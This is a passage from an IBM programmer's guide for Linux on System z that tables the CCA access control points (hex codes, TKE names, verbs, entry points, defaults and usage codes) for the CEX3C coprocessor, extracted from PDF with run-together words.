domain in the CEX3C (with hardware enforced access permissions) starts out with its own +| DEFAULT role with the defaultACP values as shown. However, it is possible to use the TKE to change +| ACP values in the DEFAULT role or to define other roles. The role to which a user is assigned determines +| theACPs available to that user. Full coverage of TKE use for configuration is outside the scope of this +| document. For details, see z/OS Cryptographic Services ICSF: Trusted Key Entry PCIX Workstation User’s +| Guide. +Table159 lists the CCAACPs. The name of eachACP is given as it appears on the panels of the TKE +user interface. Note that the group names are also given to aid locating theACPs. The table includes the +following columns: +ACP number +The hexadecimal offset, orACP code, for the command. Offsets between X'0000' and X'FFFF' that are +not listed in this table are reserved. +| Name ofACP from TKE interface +| The name of theACP as it appears on the TKE interface +Verb name +The names of the verbs that require thatACP to be enabled; for example, the Encipher (CSNBENC) +verb fails without permission to use the EncipherACP. +Entry point +The entry-point name of the verb. +Initial setting +Whether theACP is ON or OFF by default. +Usage +Usage recommendations for theACP. The abbreviations in this column are explained at the end of the +table. +See the Restrictions, Required commands, or Usage notes sections at the end of each verb description +for access control information. +|| Table159.AccessControlPointsandcorrespondingCCAverbs +|||||| ACP NameofACPfromTKEinterface Verbname Entrypoint Initial Usage +|| number setting +| (hex) +| 0001GROUP:ISPFServices +| Note: ThisgroupnamereferstoISPF,az/OSfeature.AlthoughISPFisnotrelevanttoLinuxonIBMSystemz,itislistedhereas +| shownontheTKEpanelstoavoidconfusion. +|||||| X'0018' LoadFirstDESMasterKeyPart MasterKeyProcess† CSNBMKP ON SC, +| SEL +©CopyrightIBMCorp.2007,2011 515 + +| Table159.AccessControlPointsandcorrespondingCCAverbs (continued) +|||||| ACP NameofACPfromTKEinterface Verbname Entrypoint Initial Usage +|| number setting +| (hex) +|||||| X'0019' CombineDESMasterKeyParts MasterKeyProcess† CSNBMKP ON SC, +| SEL +|||||| X'001A' SetDESMasterKey MasterKeyProcess† CSNBMKP ON SC, +| SEL +|||||| X'0032' ClearNewDESMasterKeyRegister MasterKeyProcess† CSNBMKP ON O,SUP +|||||| X'0053' LoadFirstRSAMasterKeyPart MasterKeyProcess† CSNBMKP ON SC, +| SEL +|||||| X'0054' CombineRSAMasterKeyParts MasterKeyProcess† CSNBMKP ON SC, +| SEL +|||||| X'0057' SetRSAMasterKey MasterKeyProcess† CSNBMKP ON SC, +| SEL +|||||| X'0060' ClearNewRSAMasterKeyRegister MasterKeyProcess† CSNBMKP ON SC, +| SEL +|||||| X'0124' ClearNewAESMasterKey MasterKeyProcess† CSNBMKP ON O,SUP +| (Rel. +| 4.0or +| later) +|||||| X'0125' LoadFirstAESMasterKeyPart MasterKeyProcess† CSNBMKP ON O,SUP +| (Rel. +| 4.0or +| later) +|||||| X'0126' CombineAESMasterKeyParts MasterKeyProcess† CSNBMKP ON O,SUP +| (Rel. +| 4.0or +| later) +|||||| X'0128' SetAESMasterKey MasterKeyProcess† CSNBMKP ON O,SUP +| (Rel. +| 4.0or +| later) +|||||| X'031F' ClearNewECCMasterKey MasterKeyProcess CSNBMKP ON O(Rel +| 4.1.0or +| later) +|||||| X'0320' LoadFirstECCMasterKeyPart MasterKeyProcess CSNBMKP ON O(Rel +| 4.1.0or +| later) +|||||| X'0321' CombineECCMasterKeyParts MasterKeyProcess CSNBMKP ON O(Rel +| 4.1.0or +| later) +|||||| X'0322' SetECCMasterKey MasterKeyProcess CSNBMKP ON O(Rel +| 4.1.0or +| later) +|||||| X'0326' GenerateECCkeysintheclear PKAKeyGenerate CSNDPKG ON O(Rel +| 4.1.0or +| later) +| 0002GROUP:APICryptographicServices +|||||| X'000E' Encipher-DES Encipher CSNBENC ON O +|||||| X'000F' Decipher-DES Decipher CSNBDEC ON O +|||||| X'0010' MACGenerate MACGenerate CSNBMGN ON O +|||||| X'0011' MACVerify MACVerify CSNBMVR ON O +|||||| X'0012' KeyImport KeyImport CSNBKIM ON O +|||||| X'0013' KeyExport KeyExport CSNBKEX ON O +|||||| X'001B' KeyPartImport-firstkeypart KeyPartImport† CSNBKPI ON SC, +| SEL +516 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +| Table159.AccessControlPointsandcorrespondingCCAverbs (continued) +|||||| ACP NameofACPfromTKEinterface Verbname Entrypoint Initial Usage +|| number setting +| (hex) +|||||| X'001C' KeyPartImport-middleandlast KeyPartImport† CSNBKPI ON SC, +| SEL +|||||| X'001D' KeyTestandKeyTest2 Key Test CSNBKYT ON R +|| Key Test2 CSNBKYT2 +|| Key Test Extended CSNBKYTX +|| Key Storage Initialization CSNBKSI +|| AES Key Record Create CSNBAKRC +|| AES Key Record Delete CSNBAKRD +|| AES Key Record List CSNBAKRL +|| AES Key Record Read CSNBAKRR +|| AES Key Record Write CSNBAKRW +|| DES Key Record Create CSNBKRC +|| DES Key Record Delete CSNBKRD +|| DES Key Record List CSNBKRL +|| DES Key Record Read CSNBKRR +|| DES Key Record Write CSNBKRW +|| PKA Key Record Create CSNDKRC +|| PKA Key Record Delete CSNDKRD +|| PKA Key Record List CSNDKRL +|| PKA Key Record Read CSNDKRR +|| PKA Key Record Write CSNDKRW +|||||| X'001E' ReencipherCKDS KeyTokenChange CSNBKTC ON O(Rel +|| Note: TheTKEnameforthisACPrefersto 4.1.0or +|| z/OSkeystorage(CKDS).Howeverz/OS later) +| keystorageisnotimpacted.ThisACP +| referstoaserviceforLinux,seeverbfor +| details. +|||||| X'001F' KeyTranslate KeyTranslate CSNBKTR ON O +|||||| X'0040' DiversifiedKeyGenerate-CLR8-ENC DiversifiedKeyGenerate‡ CSNBDKG ON O,SEL +|||||| X'0041' DiversifiedKeyGenerate-TDES-ENC DiversifiedKeyGenerate‡ CSNBDKG ON O,SEL +|||||| X'0042' DiversifiedKeyGenerate-TDES-DEC DiversifiedKeyGenerate‡ CSNBDKG ON O,SEL +|||||| X'0043' DiversifiedKeyGenerate-SESS-XOR DiversifiedKeyGenerate‡ CSNBDKG ON O,SEL +|||||| X'0044' DiversifiedKeyGenerate-Singlelengthor DiversifiedKeyGenerate‡ CSNBDKG ON SC, +|| samehalves SEL +|||||| X'0045' DiversifiedKeyGenerate-TDES-XOR DiversifiedKeyGenerate‡ CSNBDKG ON O,SEL +|||||| X'0046' DiversifiedKeyGenerate- DiversifiedKeyGenerate‡ CSNBDKG ON O,SEL +| TDESEMV2/TDESEMV4 +|||||| X'008A' MDCGenerate MDCGenerate CSNBMDG OFF R +|||||| X'008C' KeyGenerate-OPIM_OPEX_IMEX_etc. KeyGenerate‡ CSNBKGN ON O +|||||| X'008E' KeyGenerate-OP_IM_EX Key Generate‡ CSNBKGN ON R +|| Random Number Generate CSNBRNG +|||||| X'0090' DESKeyTokenChange KeyTokenChange CSNBKTC ON R +|||||| X'00A0' ClearPINGenerate-3624 ClearPINGenerate CSNBPGN ON O +|||||| X'00A1' ClearPINGenerate-GBP ClearPINGenerate CSNBPGN ON O(Rel +| 4.1.0or +| later) +|||||| X'00A2' ClearPINGenerate-VISAPVV ClearPINGenerate CSNBPGN ON O(Rel +| 4.1.0or +| later) +|||||| X'00A3' ClearPINGenerate-Interbank ClearPINGenerate CSNBPGN ON O(Rel +| 4.1.-or +| later) +|||||| X'00A4' ClearPINGenerateAlternate-3624Offset ClearPINGenerateAlternate† CSNBCPA ON O +|||||| X'00AB' EncryptedPINVerify-3624 EncryptedPINVerify† CSNBPVR ON O +AppendixG.Accesscontrolpointsandverbs 517 + +| Table159.AccessControlPointsandcorrespondingCCAverbs (continued) +|||||| ACP NameofACPfromTKEinterface Verbname Entrypoint Initial Usage +|| number setting +| (hex) +|||||| X'00AC' EncryptedPINVerify-GBP EncryptedPINVerify† CSNBPVR ON O +|||||| X'00AD' EncryptedPINVerify-VISAPVV EncryptedPINVerify† CSNBPVR ON O +|||||| X'00AE' EncryptedPINVerify-Interbank EncryptedPINVerify† CSNBPVR ON O +|||||| X'00AF' ClearPINEncrypt ClearPINEncrypt CSNBCPE ON O +|||||| X'00B0' EncryptedPINGenerate-3624 EncryptedPINGenerate† CSNBEPG ON O +|||||| X'00B1' EncryptedPINGenerate-GBP EncryptedPINGenerate† CSNBEPG ON O +|||||| X'00B2' EncryptedPINGenerate-Interbank EncryptedPINGenerate† CSNBEPG ON O +|||||| X'00B3' EncryptedPINTranslate-Translate EncryptedPINTranslate† CSNBPTR ON O +|||||| X'00B7' EncryptedPINTranslate-Reformat EncryptedPINTranslate† CSNBPTR ON O +|||||| X'00BB' ClearPINGenerateAlternate-VISAPVV ClearPINGenerateAlternate† CSNBCPA ON O +|||||| X'00BC' PINChange/Unblock-changeEMVPIN PINChange/Unblock† CSNBPCU ON O +| withOPINENC +|||||| X'00BD' PINChange/Unblock-changeEMVPIN PINChange/Unblock† CSNBPCU ON O +| withIPINENC +|||||| X'00C3' ClearKeyImport/MultipleClearKeyImport Clear Key Import CSNBCKI ON SC +||| -DES Multiple Clear Key Import CSNBCKM +||||| X'00C4' SecureKeyImport-DES_OP Note: ThisACPisincludedforTKEreferenceonly,the ON (Rel +|| serviceimpactedisavailableonly(forIBMSystemz)on 4.1.0or +|| z/OS. later) +|||||| X'00CD' ProhibitExport ProhibitExport CSNBPEX ON O +|||||| X'00D6' ControlVectorTranslate ControlVectorTranslate CSNBCVT ON SC +|||||| X'00D7' KeyGenerate-OPIM_OPEX_IMEX_etc. KeyGenerate‡ CSNBKGN ON SC, +|| extended SUP +|||||| X'00DA' CryptographicVariableEncipher CryptographicVariableEncipher CSNBCVE ON NRP,O, +| SUP +|||||| X'00DB' KeyGenerate-SINGLE-R Key Generate‡ CSNBKGN ON NR,SC +|| Remote Key Export‡ CSNDRKX +||||| X'00DC' SecureKeyImport-DES_IM Note: ThisACPisincludedforTKEreferenceonly,the ON (Rel +|| serviceimpactedisavailableonly(forIBMSystemz)on 4.1.0or +|| z/OS. later) +|||||| X'00DF' GenerateCVV CVVGenerate CSNBCSG ON O +|||||| X'00E0' VerifyCVV CVVVerify CSNBCSV ON O +|||||| X'00E1' UKPT-PINVerify_PINTranslate Encrypted PIN Translate† CSNBPTR ON O +|| Encrypted PIN Verify† CSNBPVR +|||||| X'00E4' HMACGenerate-SHA-1 HMACGenerate CSNBHMG ON O(Rel +| 4.1.0or +| later) +|||||| X'00E5' HMACGenerate-SHA-224 HMACGenerate CSNBHMG ON O(Rel +| 4.1.0or +| later) +|||||| X'00E6' HMACGenerate-SHA-256 HMACGenerate CSNBHMG ON O(Rel +| 4.1.0or +| later) +|||||| X'00E7' HMACGenerate-SHA-384 HMACGenerate CSNBHMG ON O(Rel +| 4.1.0or +| later) +|||||| X'00E8' HMACGenerate-SHA-512 HMACGenerate CSNBHMG ON O(Rel +| 4.1.0or +| later) +518 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +| Table159.AccessControlPointsandcorrespondingCCAverbs (continued) +|||||| ACP NameofACPfromTKEinterface Verbname Entrypoint Initial Usage +|| number setting +| (hex) +|||||| X'00E9' RestrictKeyAttribute-ExportControl RestrictKeyAttribute CSNBRKA ON O(Rel +| 4.1.0or +| later) +|||||| X'00EA' KeyGenerate2-OP_EX_IM KeyGenerate2 CSNBKGN2 ON O(Rel +| 4.1or +| later) +|||||| X'00EB' KeyGenerate2-OPOP_OPIM_OPEX_etc. KeyGenerate2 CSNBKGN2 ON O(Rel +| 4.1.0or +| later) +|||||| X'00F0' SymmetricKeyTokenChange2 KeyTokenChange2 CSNBKTC2 ON O(Rel +| 4.1.0or +| later) +|||||| X'00F1' SymmetricKeyTokenChange2-RTCMK KeyTokenChange2 CSNBKTC2 ON O(Rel +| 4.1.0or +| later) +||||| X'00F2' SecureKeyImport2-HMAC_OP Note: ThisACPisincludedforTKEreferenceonly,the ON O(Rel +|| serviceimpactedisavailableonly(forIBMSystemz)on 4.1.0or +|| z/OS. later) +|||||| X'00F4' SymmetricKeyImport2- SymmetricKeyImport CSNDSYI ON O(Rel +|| HMAC_PKCSOAEP 4.1.0or +| later) +|||||| X'00F5' SymmetricKeyExport- SymmetricKeyExport CSNDSYX ON O(Rel +|| HMAC_PKCSOAEP 4.1.0or +| later) +|||||| X'00F7' HMACVerify-SHA-1 HMACVerify CSNBHMV ON O(Rel +| 4.1.0or +| later) +|||||| X'00F8' HMACVerify-SHA-224 HMACVerify CSNBHMV ON O(Rel +| 4.1.0or +| later) +|||||| X'00F9' HMACVerify-SHA-256 HMACVerify CSNBHMV ON O(Rel +| 4.1or +| later) +|||||| X'00FA' HMACVerify-SHA-384 HMACVerify CSNBHMV ON O(Rel +| 4.1.0or +| later) +|||||| X'00FB' HMACVerify-SHA-512 HMACVerify CSNBHMV ON O(Rel +| 4.1.0or +| later) +|||||| X'0100' DigitalSignatureGenerate DigitalSignatureGenerate CSNDDSG ON O,SC +|||||| X'0101' DigitalSignatureVerify DigitalSignatureVerify CSNDDSV ON O +|||||| X'0102' PKAKeyTokenChangeRTCMK PKAKeyTokenChange CSNDKTC ON O +|||||| X'0103' PKAKeyGenerate PKAKeyGenerate† CSNDPKG ON O,SUP +|||||| X'0104' PKAKeyImport PKAKeyImport CSNDPKI ON O,SUP +|||||| X'0105' SymmetricKeyExport-DES_PKCS-1.2 SymmetricKeyExport CSNDSYX ON SC +|||||| X'0106' SymmetricKeyImport-DES_PKCS-1.2 SymmetricKeyImport† CSNDSYI ON O +|||||| X'0109' DataKeyImport DataKeyImport CSNBDKM ON O +|||||| X'010A' DataKeyExport DataKeyExport CSNBDKX ON O +||||| X'010B' SETBlockCompose Note: ThisACPisincludedforTKEreferenceonly,the ON (Rel +|| serviceimpactedisavailableonly(forIBMSystemz)on 4.1.0or +|| z/OS. later) +AppendixG.Accesscontrolpointsandverbs 519 + +| Table159.AccessControlPointsandcorrespondingCCAverbs (continued) +|||||| ACP NameofACPfromTKEinterface Verbname Entrypoint Initial Usage +|| number setting +| (hex) +||||| X'010C' SETBlockDecompose Note: ThisACPisincludedforTKEreferenceonly,the ON (Rel +|| serviceimpactedisavailableonly(forIBMSystemz)on 4.1.0or +|| z/OS. later) +|||||| X'010D' SymmetricKeyGenerate-DES_PKA92 SymmetricKeyGenerate† CSNDSYG ON SC +||||| X'0116' AccessControlManager-Readrole Note: ThisACPisincludedforreferenceonly.The ON (Rel +|| serviceimpactedisavailableonlyforIBMSystemx, 4.1.0or +|| IBMSystemp,orusingtheTKEinterface. later) +|||||| X'011E' PKAEncrypt PKAEncrypt CSNDPKE ON O,SEL +|||||| X'011F' PKADecrypt PKADecrypt CSNDPKD ON SC, +| SEL +||||| X'0121' SETBlockDecompose-PINExtension Note: ThisACPisincludedforTKEreferenceonly,the ON (Rel +||| IPINENC serviceimpactedisavailableonly(forIBMSystemz)on 4.1.0or +|| z/OS. later) +||||| X'0122' SETBlockDecompose-PINExtension Note: ThisACPisincludedforTKEreferenceonly,the ON (Rel +||| OPINENC serviceimpactedisavailableonly(forIBMSystemz)on 4.1.0or +|| z/OS. later) +|||||| X'0129' MultipleClearKeyImport/MultipleSecure MultipleClearKeyImport CSNBCKM ON SC +|| KeyImport-AES (Rel. +| 4.0or +| later) +|||||| X'012A' SymmetricAlgorithmEncipher-secureAES SymmetricAlgorithmEncipher† CSNBSAE ON O(Rel. +|| keys 4.0or +| later) +|||||| X'012B' SymmetricAlgorithmDecipher-secure SymmetricAlgorithmDecipher† CSNBSAD ON O(Rel. +|| AESkeys 4.0or +| later) +|||||| X'012C' SymmetricKeyGenerate-AES_ SymmetricKeyGenerate CSNDSYG ON SC +|| PKCSOAEP_PKCS-1.2 (Rel. +| 4.0or +| later) +|||||| X'012D' SymmetricKeyGenerate-AES_ SymmetricKeyGenerate CSNDSYG ON SC +|| ZERO-PAD (Rel. +| 4.0or +| later) +|||||| X'012E' SymmetricKeyImport-AES_ SymmetricKeyImport CSNDSYI ON O(Rel. +|| PKCSOAEP_PKCS-1.2 4.0or +| later) +|||||| X'012F' SymmetricKeyImport-AES_ZERO-PAD SymmetricKeyImport CSNDSYI ON O(Rel. +| 4.0or +| later) +|||||| X'0130' SymmetricKeyExport-AES_ SymmetricKeyExport CSNDSYX ON SC +|| PKCSOAEP_PKCS-1.2 (Rel. +| 4.0or +| later) +|||||| X'0131' SymmetricKeyExport-AES_ZERO-PAD SymmetricKeyExport CSNDSYX ON SC +| (Rel. +| 4.0or +| later) +||||| X'0139' Symmetrictokenwrapping-internal Note: ThisACPisincludedforTKEreferenceonly,the ON (Rel +||| enhancedmethod serviceimpactedisavailableonly(forIBMSystemz)on 4.1.0or +|| z/OS. later) +||||| X'013A' Symmetrictokenwrapping-internaloriginal Note: ThisACPisincludedforTKEreferenceonly,the ON (Rel +||| method serviceimpactedisavailableonly(forIBMSystemz)on 4.1.0or +|| z/OS. later) +520 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +| Table159.AccessControlPointsandcorrespondingCCAverbs (continued) +|||||| ACP NameofACPfromTKEinterface Verbname Entrypoint Initial Usage +|| number setting +| (hex) +||||| X'013B' Symmetrictokenwrapping-external Note: ThisACPisincludedforTKEreferenceonly,the ON (Rel +||| enhancedmethod serviceimpactedisavailableonly(forIBMSystemz)on 4.1.0or +|| z/OS. later) +||||| X'013C' Symmetrictokenwrapping-external Note: ThisACPisincludedforTKEreferenceonly,the ON (Rel +||| originalmethod serviceimpactedisavailableonly(forIBMSystemz)on 4.1.0or +|| z/OS. later) +|||||| X'013D' DiversifiedKeyGenerate-Allowwrapping DiversifiedKeyGenerate CSNBDKG ON O(Rel +|| overridekeywords 4.1.0or +| later) +|||||| X'013E' SymmetricKeyGenerate-Allowwrapping SymmetricKeyGenerate CSNDSYG ON O(Rel +|| overridekeywords 4.1.0or +| later) +|||||| X'0140' KeyPartImport-Allowwrappingoverride KeyPartImport CSNBKPI ON O(Rel +|| keywords 4.1.0or +| later) +|||||| X'0141' MultipleClearKeyImport-Allowwrapping MultipleClearKeyImport CSNBCKM ON O(Rel +|| overridekeywords 4.1.0or +| later) +|||||| X'0144' SymmetricKeyImport-Allowwrapping SymmetricKeyImport CSNDSYI ON O(Rel +|| overridekeywords 4.1.0or +| later) +|||||| X'0146' CKDSConversion2-Allowwrapping KeyTokenChange CSNBKTC ON (Rel +|| overridekeywords 4.1.0or +|| Note: TheTKEnameforthisACPrefersto later) +| z/OSkeystorage(CKDS).Howeverz/OS +| keystorageisnotimpacted.ThisACP +| referstoaserviceforLinux,seeverbfor +| details. +|||||| X'0147' CKDSConversion2-Convertfrom KeyTranslate2 CSNBKTR2 ON (Rel +|| enhancedtooriginal 4.1.0or +|| Note: TheTKEnameforthisACPrefersto later) +| z/OSkeystorage(CKDS).Howeverz/OS +| keystorageisnotimpacted.ThisACP +| referstoaserviceforLinux,seeverbfor +| details. +|||||| X'0149' KeyTranslate2 KeyTranslate2 CSNBKTR2 ON (Rel +| 4.1.0or +| later) +|||||| X'014A' KeyTranslate2-Allowwrappingoverride KeyTranslate2 CSNBKTR2 ON (Rel +|| keywords 4.1.0or +| later) +|||||| X'014B' KeyTranslate2-AllowuseofREFORMAT KeyTranslate2 CSNBKTR2 ON O(Rel +| 4.1.0or +| later) +|||||| X'014C' CKDSConversion2-Allowuseof KeyTokenChange CSNBKTC ON O(Rel +|| REFORMAT 4.1.0or +|| Note: TheTKEnameforthisACPrefersto later) +| z/OSkeystorage(CKDS).Howeverz/OS +| keystorageisnotimpacted.ThisACP +| referstoaserviceforLinux,seeverbfor +| details. +|||||| X'0203' RetainedKeyDelete RetainedKeyDelete CSNDRKD ON O,SEL +|||||| X'0204' PKAKeyGenerate-Clone PKAKeyGenerate† CSNDPKG ON O(Rel +| 4.1.0or +| later) +|||||| X'0205' PKAKeyGenerate-Clear PKAKeyGenerate† CSNDPKG ON O,SUP +AppendixG.Accesscontrolpointsandverbs 521 + +| Table159.AccessControlPointsandcorrespondingCCAverbs (continued) +|||||| ACP NameofACPfromTKEinterface Verbname Entrypoint Initial Usage +|| number setting +| (hex) +|||||| X'0230' RetainedKeyList RetainedKeyList CSNDRKL ON O +|||||| X'0235' SymmetricKeyImport-DES_PKA92KEK SymmetricKeyImport† CSNDSYI ON O +|||||| X'023C' SymmetricKeyGenerate-DES_ SymmetricKeyGenerate† CSNDSYG ON O,SC +| ZERO-PAD +|||||| X'023D' SymmetricKeyImport-DES_ZERO-PAD SymmetricKeyImport† CSNDSYI ON O,SC +|||||| X'023E' SymmetricKeyExport-DES_ZERO-PAD SymmetricKeyExport† CSNDSYX ON O,SC +|||||| X'023F' SymmetricKeyGenerate-DES_PKCS-1.2 SymmetricKeyGenerate† CSNDSYG ON O,SC +||||| X'0240' AuthorizeUDX Note: ThisACPisincludedforreferenceonly.The ON (Rel +|| serviceimpactedisavailableonlyforIBMSystemx, 4.1.0or +|| IBMSystemp,orusingtheTKEinterface. later) +|||||| X'0241' PKAKeyTokenChangeRTNMK PKAKeyTokenChange CSNDKTC ON O(Rel +| 4.1.0or +| later) +|||||| X'0273' SecureMessagingforKeys SecureMessagingforKeys CSNBSKY ON O +|||||| X'0274' SecureMessagingforPINs SecureMessagingforPINs CSNBSPN ON O +|||||| X'0275' DATAMKeyManagementControl Diversified Key Generate CSNBDKG ON O(Rel +||| Data Key Import CSNBDKM 4.1.0or +||| Data Key Export CSNBDKX later) +|| Key Export CSNBKEX +|| Key Generate CSNBKGN +|| Key Import CSNBKIM +|||||| X'0276' KeyExport-Unrestricted KeyExport CSNBKEX ON O,SC +|||||| X'0277' DataKeyExport-Unrestricted DataKeyExport CSNBDKX ON O,SC +|||||| X'0278' KeyPartImport-ADD-PART KeyPartImport† CSNBKPI ON SC, +| SEL +|||||| X'0279' KeyPartImport-COMPLETE KeyPartImport† CSNBKPI ON SC, +| SEL +|||||| X'027A' KeyPartImport-Unrestricted KeyPartImport CSNBKPI ON O,SC +|||||| X'027B' KeyImport-Unrestricted KeyImport CSNBKIM ON O,SC +|||||| X'027C' DataKeyImport-Unrestricted DataKeyImport CSNBDKM ON O,SC +|||||| X'027D' PKAKeyGenerate-PermitRegeneration PKAKeyGenerate† CSNDPKG ON O,NRP, +|| Data SC +|||||| X'027E' PKAKeyGenerate-PermitRegeneration PKAKeyGenerate† CSNDPKG ON O,NRP, +|| DataRetain SC +|||||| X'0290' DiversifiedKeyGenerate-DKYGENKY- Diversified Key Generate‡ CSNBDKG OFF O,SC +||| DALL PIN Change/Unblock‡ CSNBPCU +|||||| X'0291' TransactionValidation-Generate TransactionValidation† CSNBTRV ON O,SEL +|||||| X'0292' TransactionValidation-VerifyCSC-3 TransactionValidation† CSNBTRV ON O +|||||| X'0293' TransactionValidation-VerifyCSC-4 TransactionValidation† CSNBTRV ON O +|||||| X'0294' TransactionValidation-VerifyCSC-5 TransactionValidation† CSNBTRV ON O +|||||| X'0295' SymmetricKeyEncipher/Decipher- EnablesCPACFkeytranslationfor N/A ON O +|| EncryptedDESkeys DESkeys. +|||||| X'0296' SymmetricKeyEncipher/Decipher- EnablesCPACFkeytranslationfor N/A ON O +|| EncryptedAESkeys AESkeys. +|||||| X'0297' KeyPartImport2-Loadfirstkeypart_ KeyPartImport2 CSNBKPI2 ON O(Rel +|| require3keyparts 4.1.0or +| later) +|||||| X'0298' KeyPartImport2-Loadfirstkeypart_ KeyPartImport2 CSNBKPI2 ON O(Rel +|| require2keyparts 4.1.0or +| later) +522 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +| Table159.AccessControlPointsandcorrespondingCCAverbs (continued) +|||||| ACP NameofACPfromTKEinterface Verbname Entrypoint Initial Usage +|| number setting +| (hex) +|||||| X'0299' KeyPartImport2-Loadfirstkeypart_ KeyPartImport2 CSNBKPI2 ON O(Rel +|| require1keyparts 4.1.0or +| later) +|||||| X'029A' KeyPartImport2-Addsecondof3ormore KeyPartImport2 CSNBKPI2 ON O(Rel +|| keyparts 4.1.0or +| later) +|||||| X'029B' KeyPartImport2-Addlastrequiredkey KeyPartImport2 CSNBKPI2 ON O(Rel +|| part 4.1.0or +| later) +|||||| X'029C' KeyPartImport2-Addoptionalkeypart KeyPartImport2 CSNBKPI2 ON O(Rel +| 4.1.0or +| later) +|||||| X'029D' KeyPartImport2-Completekey KeyPartImport2 CSNBKPI2 ON SEL(Rel +| 4.1.0or +| later) +|||||| X'0300' NOCVKEKusageforexport-related Data Key Export CSNBDKX ON O(Rel +|||| functions Key Export CSNBKEX 4.1.0or +||| Key Generate CSNBKGN later) +|| Remote Key Export CSNDRKX +| +|||||| X'0301' ProhibitExportExtended ProhibitExportExtended CSNBPEXX ON O +||||| X'0303' PCFCKDSconversionutility Note: ThisACPisincludedforTKEreferenceonly,the ON (Rel +|| serviceimpactedisavailableonly(forIBMSystemz)on 4.1.0or +|| z/OS. later) +|||||| X'0309' KeyPartImport-RETRKPR KeyPartImport CSNBKPI ON O(Rel +| 4.1.0or +| later) +|||||| X'030A' NOCVKEKusageforimport-related Data Key Import CSNBDKM ON O(Rel +|||| functions Key Import CSNBKIM 4.1.0or +||| Key Generate CSNBKGN later) +|| Remote Key Export CSNDRKX +|||||| X'030C' DSGZERO-PADunrestrictedhashlength DigitalSignatureGenerate CSNDDSG OFF O,SC +|||||| X'030F' TrustedBlockCreate-CreateaTrusted TrustedBlockCreate CSNDTBC ON O,SUP +|| KeyBlockinInactiveform (Rel. +| 4.0or +| later) +|||||| X'0310' TrustedBlockCreate-ActivateanInactive TrustedBlockCreate CSNDTBC ON O,SUP +|| TrustedKeyBlock (Rel. +| 4.0or +| later) +|||||| X'0311' PKAKeyImport-ImportanExternal PKAKeyImport CSNDPKI ON O,SEL +|| TrustedKeyBlocktointernalform (Rel. +| 4.0or +| later) +|||||| X'0312' RemoteKeyExport-Generateorexporta RemoteKeyExport CSNDRKX ON O,SEL +|| keyforusebyanon-CCAnode (Rel. +| 4.0or +| later) +|||||| X'0313' PTREnhancedPINSecurity Clear PIN Generate Alternate CSNBCPA OFF O,SC, +||| Clear PIN Encrypt CSNBCPE SEL +||| Encrypted PIN Generate CSNBEPG (Rel. +||| Encrypted PIN Translate CSNBPTR 4.0or +||| Encrypted PIN Verify CSNBPVR later) +|| PIN Change/Unblock CSNBPCU +AppendixG.Accesscontrolpointsandverbs 523 + +| Table159.AccessControlPointsandcorrespondingCCAverbs (continued) +|||||| ACP NameofACPfromTKEinterface Verbname Entrypoint Initial Usage +|| number setting +| (hex) +|||||| X'0318' PKAKeyTranslate-fromCCARSAtoSC PKAKeyTranslate CSNDPKT ON O(Rel. +|| VisaFormat 4.0or +| later) +|||||| X'0319' PKAKeyTranslate-fromCCARSAtoSC PKAKeyTranslate CSNDPKT ON O(Rel. +|| MEFormat 4.0or +| later) +|||||| X'031A' PKAKeyTranslate-fromCCARSAtoSC PKAKeyTranslate CSNDPKT ON O(Rel. +|| CRTFormat 4.0or +| later) +|||||| X'031B' PKAKeyTranslate-fromsourceEXPKEK PKAKeyTranslate CSNDPKT ON O(Rel. +|| totargetEXPKEK 4.0or +| later) +|||||| X'031C' PKAKeyTranslate-fromsourceIMPKEK PKAKeyTranslate CSNDPKT ON O(Rel. +|| totargetEXPKEK 4.0or +| later) +|||||| X'031D' PKAKeyTranslate-fromsourceIMPKEK PKAKeyTranslate CSNDPKT ON O(Rel. +|| totargetIMPKEK 4.0or +| later) +|||||| X'0350' ANSIX9.8PIN-EnforcePINblock Clear PIN Generate Alternate CSNBCPA OFF O,R +|||| restrictions Encrypted PIN Translate CSNBPTR (Rel +||| Secure Messaging for PINs CSNBSPN 4.1.0or +| later) +|||||| X'0351' ANSIX9.8PIN-Allowmodificationof Encrypted PIN Translate CSNBPTR OFF O,SC +|||| PAN_01_0350 Secure Messaging for PINs CSNBSPN (Rel +| 4.1.0or +| later) +|||||| X'0352' ANSIX9.8PIN-AllowonlyANSIPIN Encrypted PIN Translate CSNBPTR OFF O,SC +|||| blocks_01_0350 Secure Messaging for PINs CSNBSPN (Rel +| 4.1.0or +| later) +| Thefollowingcodesareusedinthistable: +|| ID Initialdefault. +|| O Usageofthiscommandisoptional;enableitasrequiredforauthorizedusage. +|| R Enablingthiscommandisrecommended. +|| NR Enablingthiscommandisnotrecommended. +|| NRP Enablingthiscommandisnotrecommendedforproduction. +|| SC Usageofthiscommandrequiresspecialconsideration. +|| SEL Usageofthiscommandisnormallyrestrictedtooneormoreselectedroles. +|| SUP Thiscommandisnormallyrestrictedtooneormoresupervisoryroles. +|| † Thisverbperformsmorethanonefunction,asdeterminedbythekeywordintherule_arrayparameteroftheverbcall. +| Notallfunctionsoftheverbrequirethecommandinthisrow. +|| ‡ Thisverbdoesnotalwaysrequirethecommandinthisrow.Useasdeterminedbythecontrolvectorforthekeyandthe +| actionbeingperformed. +| +524 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +| +TKE Version 6.0 and higher +The TKE workstation allows you to enable or disable verb access control points. For systems that do not +use the optional TKE workstation, most access control points (current and new) are enabled in the +DEFAULT Role with the appropriate licensed internal code on the CEX3C. For more information about the +TKE workstation, see z/OS Cryptographic Services ICSF: Trusted Key Entry PCIX Workstation User’s +Guide. +| You must have a TKE V6.0 or higher workstation in order to see supported CEX3C features. They are not +| seen when using earlier TKE workstations. TKE Version 4.0 through TKE Version 6.0 can access CEX2C +| features. +Use of particular cryptographic or key management verb functions with the CEX3C are controlled through +access control points. Most of these are enabled in the DEFAULT role. +New TKE users and non-TKE users have almost all access control points enabled. +Note: Access control points DKYGENKY-DALLand DSG ZERO-PAD unrestricted hash length are always +disabled in the DEFAULT role for all customers (TKE and non-TKE).ATKE workstation is required +to enable these access control points. +| For CCARelease 4.1.0, there are new access control points for these verbs: +| v Clear PIN GenerateAlternate (CSNBCPA) - EnforceANSI X9.8 PIN Rules (offset X'0350') +| v 